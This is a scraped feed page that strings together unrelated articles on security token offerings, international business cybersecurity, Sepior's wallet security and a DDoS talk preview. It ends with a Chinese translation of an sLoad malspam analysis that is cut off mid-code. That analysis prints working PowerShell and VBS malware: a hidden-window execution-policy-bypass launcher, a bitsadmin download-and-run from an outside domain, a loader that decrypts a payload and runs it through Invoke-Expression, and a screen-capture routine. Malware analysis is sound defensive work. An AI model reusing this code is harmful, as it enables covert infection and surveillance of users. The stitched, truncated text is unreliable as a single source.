Now that the ICO mania isgradually dying out, blockchain startups are seeking new ways to secure funding; and it seems the STO is cropping up as the solution.

Over the past several months, tons of blockchain companies including some that already raised funds in ICOs are planning their own STOs. The move towards STOs does grant more rights to holders, but it is concerning that a year after raising billions of dollars in ICOs, companies are now seeking even more funding.

Indeed, mainstream crowdfunding platforms like Indiegogo are also getting in on the STO action (though their offerings might not always be open to everyone ). Hopefully, it goes better than theirbotched foray into ICOs.

Published December 3, 2018 ― 11:39 UTC

International Business and Cybersecurity

$
0
0

International Business and Cybersecurity
https://www.flickr.com/photos/kvinokurov/14658257525

Cybersecurity is important to every business. As soon as you collect a customer’s personal information, credit card information, or any other data, you are obligated to ensure that it is protected and used properly at all times.

This is not just a moral obligation. It is a legal one, and the recent General Data Protection Regulations (GDPR) passed in the EU means companies must be even more transparent about how information they collect is stored and used.

What does all this mean to an international business? It means there are challenges, including regulations in the countries where you do business, the protection of data while it is being transmitted, and the threats that are unique to individual countries and territories.

Challenges of Running a GlobalBusiness
International Business and Cybersecurity
Image Source: Pixabay

Of the most important challenges of running a global business of nearly every CEO is cyberthreats. While other concerns like over regulation, geopolitical uncertainty, and changing customer demand also impact the efficiency necessary to run a global business, cyberthreats are a prominent part of any conversation.

The reasons? Everything is run digitally in today’s market, and if network security is breached in any way, both data and efficiency can be lost. Also, it is vital for companies to maintain a reputation for keeping customer data secure; one breach can cost millions in business.

This is especially challenging when servers and other physical data locations may be in countries that have differing security protocols. This is one thing GDPR tries to address: a uniformity of regulation. However, physical security and the risk of compromising human assets goes up with international trade.

This obstacles can be overcome, but they require leadership that is agile, adaptable to a variety of circumstances, and understands the nature of those risks.

Insuring Your DigitalAssets
International Business and Cybersecurity
Image Source: Pixabay

What about insurance? Normally, digital assets should be covered by your business policy , but when dealing with international business, it is especially important that you pay attention to the type of policy you have and the terms related to incidents overseas. There are some important questions to ask when you look at which of your digital assets are covered.

What is your policy for? Does it include data breach coverage? This is an important component of your small business insurance package. What situations does it cover and not cover? Does the policy cover cyberthreats? Physical damage to servers? How much cost does it cover? What happens with international incidents? The key with global business is that much of what can happen to your small business can happen outside of the U.S. What does your insurance cover when this is the case?

Small business insurance should not be seen as a cost, but rather as an investment ― but it is up to you to make sure your investment is sound. Global business demands an international policy, and while the cost may be greater, this is inherent in the risks involved.

Adaptive Security and GlobalBusiness
International Business and Cybersecurity
Image Source: Pixabay

There is a new kid on the block thanks to artificial intelligence and machine learning: adaptive security . Instead of simply focusing on responding to an attack once it has already happened and recovering lost data, this method works differently. Here are some of the features of adaptive security that appeal to many businesses:

Prevention: Artificial intelligence and machine learning are enabling protection programs to predict types of attacks and move to prevent them before the data breach even happens. Detection: Even if a threat gets through the firewalls and encryption, if a system can detect the breach before any damage has been done, it can be isolated and neutralized. Response: An adaptive security system can do one of two things: First, it can immediately respond to a threat to either neutralize it as mentioned above or, at worst, mitigate some of the damage before it is beyond recovery. Secondly, it can respond with long-term changes in policy and data storage methods and identity verification. Prediction: Probably the most powerful aspect of an adaptive security system is that it can predict future attacks through behavior analysis , adding yet another layer to prevention.

Adaptive security is likely to become the norm for most businesses going forward simply because, as threats become more sophisticated, a sophisticated answer is the only thing that will be effective.

Doing business internationally has many challenges, but one of the biggest is cybersecurity, and battling threats worldwide is much more difficult. It is important to understand these challenges, ensure that your digital assets are insured, and use the most adaptive security tools possible to protect your business and your customers’ data.

Sepior Attempts to Consign Crypto Exchange Hacks to History

$
0
0

2018 has seen some spectacular cyber heists in the crypto space. These ranged from the $534 million hack of crypto exchange Coincheck in January, $195 million hack of Bitgrail in February to the $40 million cyber fraud at crypto exchange Coinrail in June. The nature of cryptocurrency, together with an embryonic and ill-prepared crypto exchange sector has meant that it’s been a hackers paradise.

Losses of this magnitude are unsustainable and with that, solutions are beginning to emerge to deal with the problem. Cryptography software company, Sepior recently launched its Thresholdsig wallet security software for cryptocurrency exchanges and institutional traders. This is a promising development for the industry as its product is the first in the industry to be based on multiparty computation (MPC). In speaking with The Bitcoin Mag, Sepior CEO Ahmet Tuncay explained its product offering:

“The idea is that one key might exist in the client device, which might be an iPhone for example. Then another key might be the broker and a third key might be a trusted third party. As long as there are a number of signatories to a transaction, it must be secure and valid.”

Rather than using separate keys, MPC needs just one key with all parties possessing a part of the key no one party possesses the whole key. Whilst this approach clearly has advantages in terms of security, it also assists in terms of privacy. Frank Wiener, Chief Marketing Officer with Sepior clarified:

“You get the improved privacy of a single signature whilst you still have the full security aspect of multiple approvers.”

Added to this is the fact that Sepior’s solution optimizes on-chain efficiency by keeping the multi-sig process within one single signature. As the block sizes are fixed in blockchain, you can’t get as many transactions on the same block. Multi-sig usually adds an overhead of up to 40% in terms of space allocation on the blockchain. However, Sepior’s use of MPC technology means that this overhead is negated.

Japan’s SBI Group recently announced an agreement to license Sepior’s Threshold-Sig Wallet Security technology and to jointly develop a proprietary wallet to secure the on-line contents and transactions on SBI’s virtual currencies exchange platform, VCTRADE.

Representative Director, CEO and President of SBI Holdings commented on the announcement:

“After extensive investigation, our security research team determined threshold signatures based on multiparty computation (MPC) offered our desired level of security, performance, and scalability needed to manage transactions for our growing SBI Virtual Currencies customer base.”

The functionality of Sepior’s offering extends beyond securing funds on cryptocurrency exchanges. It also provides privacy control on permissioned blockchains. Distributed ledger technology is being used to store smart contracts and data on enterprise level blockchains with a view towards automating the execution of contracts.

Various stakeholders in the process can get the data they need from the blockchain, execute their contractual obligations and update the blockchain accordingly to reflect this with the distributed ledger showing a history of all steps of the transaction.

The issue that has emerged with this process is that enterprise level data is extremely sensitive. Not all stakeholders to a process need to have access to all of the data they just need sufficient access to effect their contractual obligations. With this in mind, Sepior offer a solution Sepior Threshold KMS which provides privacy control so that different users who access these smart contracts on the blockchain have visibility only to the precise information they need to conduct their part of the transaction.

The underlying technology used is similar to that which the company uses to secure cryptocurrency exchange hot wallets but it has been optimized for this specific use case in terms of granular data access control on permissioned blockchains.

Hyperledger Fabric has become the go-to choice for many enterprises running permissioned blockchains. It provides for granular access control. However, the issue is one of scalability with an inordinate amount of virtual channels required.

The other approach which may be taken is through cryptographic segregation where parts of the master data is masked. The difficulty switches from that of infinite channels to managing multiple encryption keys. Traditionally, this would involve a hardware security module but Sepior is disrupting this methodology by use of a software based key management system. “We can provide a very granular upper object encryption strategy for a blockchain that will allow businesses to selectively obfuscate the data” explains Tuncay. Sepior’s solution is off-chain and thus, blockchain agnostic.

The long list of hacked cryptocurrency exchanges in recent times has been an embarrassment for the industry, threatening the credibility of crypto itself. There are so many aspects of cryptocurrency which need to be developed to make it a truly market ready proposition. Hopefully, solutions such as this one will at least consign exchange hacking to the past.

FIT 2019议题前瞻:分布式拒绝服务攻击预警研究 | 企业安全俱乐部

$
0
0

DDoS 攻击流量峰值每年都不断地被超越,上半年的一起 Memcached DDoS 攻击,其峰值1.7 Tbps 达到了一个新的高度。随着各行各业的互联网化,DDoS 的攻击面也越来越多。

僵尸网络所造成的破坏的主要特征之一就是其本身具有极强的隐蔽性,这就使得攻击无法及时被感知,由于其攻击而导致的受到感染的主机又比较分散,使其更加无法被追查以及清除。同时由僵尸网络驱动的新型DDoS攻击出租服务平台迭起,获取DDoS攻击发起能力日趋简单,成本根式持续走低,一个不懂僵尸网络的人,只需要花个几美金,就能够给其他网站带来非常严重的影响。

现阶段全球对于僵尸网络所发起的 DDoS 攻击并无有效的应对措施,只能够对其进行感知防护,只有在主机受到感染后接收控制命令,进而发出DDoS 攻击而导致网络流量出现问题才能够发现网络运行存在问题,这就需要在主机受到感染进而发出执行命令前检测感知网络异常现象,提出针对性的预警。

马西兴是金山云安珀实验室资深研究员,拥有超过十年的安全领域从业经历,2017年9月加入金山云后,主导linux环境下大规模分布式拒绝服务攻击预警项目的研究,在病毒样本逆向、恶意流量检测、僵尸网络漏洞利用、主机入侵检测等领域均具备丰富的实战经验。这次他将在FIT2019大会的「企业安全俱乐部」环节和与会嘉宾分享【分布式拒绝服务攻击预警研究】 成果,讨论一种对僵尸网络发动分布式拒绝服务攻击进行预警的新思路。

基于传统肉鸡养殖场的僵尸网络检测方法主要基于个各类蜜罐、入侵检测系统、Netflow异常流量检测等安全分析系统。而本次马西兴带来的方法有别于以往,是对肉鸡样本进行了深入逆向分析,按照其和C&C端的交互协议,对BOT端进行代码重构,能够做到在C&C端发出攻击指令的同时,对目标站点进行攻击预警,同时在系统资源占用、反沙箱、漏洞利用监测等方面达到了较好的效果。


FIT 2019议题前瞻:分布式拒绝服务攻击预警研究 | 企业安全俱乐部
FIT 2019互联网安全创新大会

CodeSec互联网安全创新大会(FIT)是由国内领先的互联网安全新媒体平台CodeSec.Net主办的年度互联网安全盛会,WitAwards互联网安全颁奖盛典也将同期举行。

FIT 2019大会会期为 2018年12月12日~13日 ,会议将在 上海宝华万豪酒店 举行。本次大会主论坛议程聚焦 「全球高峰会」、「前沿安全神盾局」、「WitAwards颁奖盛典」、「WIT安全创新者联盟」「X-TECH技术派对」、「HACK DEMO」 六大板块,独立分设 「白帽LIVE」「企业安全俱乐部」 两大分论坛,与来自全球的安全从业者、优秀技术专家、企业安全建设者、白帽安全专家、研究机构等共同展开演讲与探讨。同时 「中国首席信息安全官高峰论坛 」、 「漏洞马拉松线下邀请赛」 也将在特色分会场同期举行。此次盛会致力于分享2018年度安全行业创新硕果,共同探索与展望未来安全新边界。

>>>【FIT 2019官网】


FIT 2019议题前瞻:分布式拒绝服务攻击预警研究 | 企业安全俱乐部

SLoad Powershell malspam正在蔓延到意大利

$
0
0
一、介绍

在过去的几个月里,CERT-Yoroi观察到一种新兴攻击模式。一系列恶意电子邮件共享通用技术,这些技术可能与一个威胁组织对意大利网络全面的攻击有关。目前尚不清楚这些攻击尝试是由一个完善的网络犯罪组织修改其TTP所致,还是全新的攻击尝试。但CERT-Yoroi正在通过内部代号“Sload-ITA”(TH-163)来跟踪此威胁。去年五月, SANS ICS 研究人员在英国也记录了类似的操作行为。恶意行动通过滥用基于压缩存档中的代码隐藏技术和类似的drop-url模式共享相同的drop mode:

2018-10-08 使用“/AE-9455933DGW-nota-cliente” url 模式

2018-10-09 使用“/fattura-per-cliente-QN-OAYSAPV” url 模式

2018-10-15 使用“/MA-47462780Y3-documento-cliente”url 模式

某些恶意邮件已从“PEC”邮箱发送

2018-11-19 使用“/documento-aggiornato-novembre-ER16909FP9”

CERT-PA 追踪

Yoroi-Cybaze ZLAB收集并解析了在响应操作期间恢复的样本,用来揭示这些攻击者使用的恶意植入程序的细节。下图总结了sLoad恶意软件感染的步骤。


SLoad Powershell malspam正在蔓延到意大利

图1. SLoad感染流程

二、技术分析

分析的恶意样本是压缩zip存档,包含两个不同文件:

1.一个假装指向系统文件夹的链接,名为“invio fattura elettronica.lnk”

2.一个隐藏的JPEG图像“image _20181119_100714_40.jpg”,该文件存储为HA属性。

尽管从存档中提取的LNK文件表面上看很无辜,但它的武器化方式与APT29在其最新操作期间采用的方式类似,表明该技术是几种恶意网络武器的一部分。实际上,当用户双击文件时,批处理脚本会生成下面的powershell脚本:

C:\windows\System32\cmd.exe /C powershell.exe -nop -eP ByPass -win hi"d"den -c "&{$9oc=get-childItem -path c:\users\* -recurse -force -include documento-aggiornato-novembre-*.zip;$g3u=get-content -LiteralPat $9oc.fullname;$g3u[$g3u.length-1]|iex}"

PS脚本搜索与模式“documento-aggiornato-novembre * .zip”匹配的任何文件:如果文件存在,则脚本在其末尾提取一部分代码,然后通过“IEX”调用它;我们检查了zip文件并恢复了这部分代码。在下图中,可以看到附件存档内容分为粉红色和黄色,外来代码为蓝色。


SLoad Powershell malspam正在蔓延到意大利

图2.添加到Zip存档的代码

该部分文件包含powershell脚本调用的可执行代码。由于调用了“bitsadmin.exe”,此代码能够从“firetechnicaladvisor.com”下载其他脚本,然后将所有这些新下载的文件存储在“%APPDATA%/ <UUID>”文件夹中。下图显示了下载恶意植入程序后文件夹的内容:


SLoad Powershell malspam正在蔓延到意大利

图3.恶意植入程序的组件

下面的片段显示了负责下载这些恶意软件的代码。

$env_appData=$env:appdata;
$cmd='cmd';
$gen_random_value_name_ps= -join ((65..90) + (97..122) | Get-Random -count 14 | % {[char]$_});
$get_uuid=(Get-WmiObject Win32_computerSystemProduct).UUid;
$set_hidden='hidden';
$folder_to_store_file = $env_appData+'\'+$get_uuid;
$h=$folder_to_store_file+'\d';
if(!(test-path $folder_to_store_file)){
New-item -itemtype directory -Force -path $folder_to_store_file;
};
$ps_to_download_and_execute='/c echo 1 > '+$h+' & bitsadmin /wrap /transfer fredikasledi /download /priority FOReGrOUnd "https://firetechnicaladvisor.com/globa/monu" '+$folder_to_store_file+'\'+$gen_random_value_name_ps+'.ps1 & del '+$h+' & exit';
start-process -wiNdowstyLe $set_hidden $cmd $ps_to_download_and_execute;
$e=1;
Start-Sleep -s 6;
$p2='powe';
while($e -eq 1){
if(test-path $h)
Start-Sleep -s 3
}else{
$e=2
}
};
Start-Sleep -s 7;
$p1='ell';
$ps_to_download_and_execute='/c '+$p2+'rsh'+$p1+' -nop -ep bypass -File '+$folder_to_store_file+'\'+$gen_random_value_name_ps+'.ps1 & exit';
start-process -wiNdowstyLe $set_hidden $cmd $ps_to_download_and_execute;

NxPgKLnYEhMjXT.ps1脚本安装并植入受害者的机器,在系统上注册计划任务,以确保感染持续存在。然后,该脚本会自删除。


SLoad Powershell malspam正在蔓延到意大利

图4.恶意植入程序的安装脚本

在快速查看CxeLtfwc.ps1脚本之后,我们还注意到恶意软件使用cmdlet“Invoke-Expression”从“config.ini”文件加载并运行另一段代码。

param ([string]$k = "");
$random_name_of_powershell=Get-Process -name powershell*;
if ($random_name_of_powershell.length -lt 2){
$folder_name = (Get-WmiObject Win32_ComputerSystemProduct).UUID ;
$log = $env:APPDATA+"\"+$folder_name;
$key=$k -split "," ;
$Secure= Get-Content $log"\config.ini";
$Encrypted= ConvertTo-SecureString $Secure -key $key;
$encrypted_string = [System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($Encrypted);
$expression_to_execute = [System.Runtime.InteropServices.Marshal]::PtrToStringAuto($encrypted_string);
Invoke-Expression $expression_to_execute;
}

下图显示了恶意植入程序的其他组件如何调用此特定代码:可以注意到脚本是使用输入参数(“1,2,3,4,5,6,7,8, 9,10,11,12,13,14,15,16“)启动的,该参数作为密钥来解密”config.ini“的内容:恶意软件的真实有效载荷。

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden -ep bypass -File C:\Users\admin\AppData\Roaming\42082A54-EE38-CA41-8C45-A16336FBCCD9\CxeLtfwc.ps1 -k 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16
--------------
C:\Users\admin\AppData\Roaming\42082A54-EE38-CA41-8C45-A16336FBCCD9\<NOME_CASUALE>.vbs" 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16
--------------
Dim objWmi, colItems, objItem, strUUID, blnValidUUID,oShell
Set objWmi = GetObject("winmgmts:\\" & "." & "\root\cimv2")
Set colItems = objWmi.ExecQuery("Select * from Win32_ComputerSystemProduct")
Set oShell = WScript.CreateObject ("WScript.Shell")
oShell.run "power"+"shel"+"l.exe -win hi"+"dden -ep by"+"pass -Fi"+"le C:\Users\admin\AppData\Roaming\42082A54-EE38-CA41-8C45-A16336FBCCD9\WpaejPkv.ps1 -k "& WScript.Arguments(0),0,True
Set oShell = Nothing

“config.ini”和“web.ini”文件都在运行时通过以下一组系统命令来进行解密和调用:

“ConvertTo-SecureString”,
[System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($Encrypted);
[System.Runtime.InteropServices.Marshal]::PtrToStringAuto($slStr);

下图显示了“config.ini”文件加密后代码的一部分,之后是其解密的代码。


SLoad Powershell malspam正在蔓延到意大利

图5.“config.ini”中的加密有效载荷

这是恶意客户端的源代码:

$runDMC = "cmd";
<a href="/cdn-cgi/l/email-protection" data-cfemail="8bafe0eef2b6cb">[email protected]</a>(1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16)
$morty=$env:APPDATA;
function Get-ScreenCapture{
Param(
[Parameter()]
[Alias("Path")]
[string]$Directory = ".",
[Parameter()]
[ValidateRange(70,100)]
[int]$Quality,
[Parameter()]
[Switch]$AllScreens
)
Set-StrictMode -Version 2
Add-Type -AssemblyName System.Windows.Forms
if ($AllScreens){
$Capture = [System.Windows.Forms.Screen]::AllScreens
}else{
$Capture = [System.Windows.Forms.Screen]::PrimaryScreen
}
foreach ($C in $Capture){
$screenCapturePathBase = $path+"\ScreenCapture"
$cc = 0
while (Test-Path "${screenCapturePathBase}${cc}.jpg") {
$cc++
}
$FileName="${screenCapturePathBase}${cc}.jpg"
$Bitmap = New-Object System.Drawing.Bitmap($C.Bounds.Width, $C.Bounds.Height)
$G = [System.Drawing.Graphics]::FromImage($Bitmap)
$G.CopyFromScreen($C.Bounds.Location, (New-Object System.Drawing.Point(0,0)), $C.Bounds.Size)
$g.Dispose()
$Quality=70;
$EncoderParam = [System.Drawing.Imaging.Encoder]::Quality
$EncoderParamSet = New-Object System.Drawing.Imaging.EncoderParameters(1)
$EncoderParamSet.Param[0] = New-Object System.Drawing.Imaging.EncoderParameter($EncoderParam, $Quality)
$JPGCodec = [System.Drawing.Imaging.ImageCodecInfo]::GetImageEncoders() | Where{$_.MimeType -eq 'image/jpeg'}
$Bitmap.Save($FileName ,$JPGCodec, $EncoderParamSet)
}
}
$productID = (Get-WmiObject Win32_ComputerSystemProduct).UUID ;
$path = $morty+"\"+$productID;
$btlog=$path+'\btc.log'
$pp=$path+'\'+$productID;
try{ If(test-path $pp"_0"){ Remove-Item $pp"_*";}}catch{}
try{ If(test-path $pp){Remove-Item $pp;}}catch{}
$ldf='/C bitsadmin /reset';
start-process -wiNdowStylE HiDden $runDMC $ldf;
$Secure= Get-Content $path"\web.ini";
$Encrypted= ConvertTo-SecureString $Secure -key $key;
$slStr = [System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($Encrypted);
$rStr = [System.Runtime.InteropServices.Marshal]::PtrToStringAuto($slStr);
$d
Viewing all 12749 articles
Browse latest View live